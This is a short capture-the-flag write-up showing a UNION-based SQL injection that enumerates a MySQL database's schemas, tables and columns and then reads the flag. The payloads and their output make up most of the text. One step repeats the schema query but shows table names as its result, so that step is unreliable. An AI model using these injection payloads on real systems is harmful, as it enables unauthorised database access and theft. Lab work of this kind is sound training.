80

Looks like a capture the flag site and the vulnerability is on the first page. We need to exploit it to get te flag for the second page.

In-bind SQL injection.

t' union select group_concat(schema_name) from INFORMATION_SCHEMA.SCHEMATA-- -

mysql, information_schema, performance_schema, sys, november(current)

t' union select group_concat(schema_name) from INFORMATION_SCHEMA.SCHEMATA-- -

flag,players

t' union select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where table_name='flag'-- -

one

t' union select one from november.flag-- -

UHC{F1rst_5tep_2_Qualify}

Last updated 10 months ago